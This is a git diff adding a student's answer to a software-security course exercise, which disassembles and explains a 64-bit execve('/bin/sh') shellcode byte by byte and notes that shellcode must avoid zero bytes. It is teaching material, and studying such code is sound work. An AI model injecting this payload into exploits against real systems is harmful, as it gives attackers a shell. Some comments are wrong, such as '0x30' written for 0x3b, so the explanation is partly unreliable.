ass5bex1 done

[sws1-1415.git] / ass5b / mart / sws1-assignment5b-s4109503-s4202015 / exercise1

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
new file mode 100644 (file)
index 0000000..22d5af2
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise1
@@ -0,0 +1,40 @@
+a, b).
+\x48\x31\xd2                                   xor %rdx, %rdx
+Put in %rdx the value of %rdx xor'ed with %rdx. This basically means 0.
+
+\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68       mov $0x68732f6e69622f2f, %rbx
+Put "/bin/sh" in the %rbx register.
+
+\x48\xc1\xeb\x08                               shr $0x8, %rbx
+Bitshift the %rbx register 8 places to the right
+
+\x53                                           push %rbx
+Put the %rbx register on the stack
+
+\x48\x89\xe7                                   mov %rsp, %rdi
+Put the top item on the stack(%rbx, "/bin/sh") in %rdi
+
+\x52                                           push %rdx
+Push %rdx on the stack(which was 0)
+
+\x57                                           push %rdi
+Push %rdi on the stack(which was %rbx, which was "/bin/sh")
+
+\x48\x89\xe6                                   mov %rsp, %rsi
+Put the top item from the stack in %rsi("/bin/sh")
+
+\xb0\x3b                                       mov $0x3b, %al
+Put 0x30 in %al which is the short %rax, return value.
+
+\x0f\x05                                       syscall
+This does a sys_execve call. in the following format
+       sys_execve(%rdi, %rsi %rdx)
+       sys_execve(file, argv, envp)
+       sys_execve("/bin/sh", "/bin/sh", NULL);
+
+c)
+The shellcode will start up a shell.
+
+d)
+The string containing the shell code is not padded with zeros. Zero bytes
+must not occur in shell code.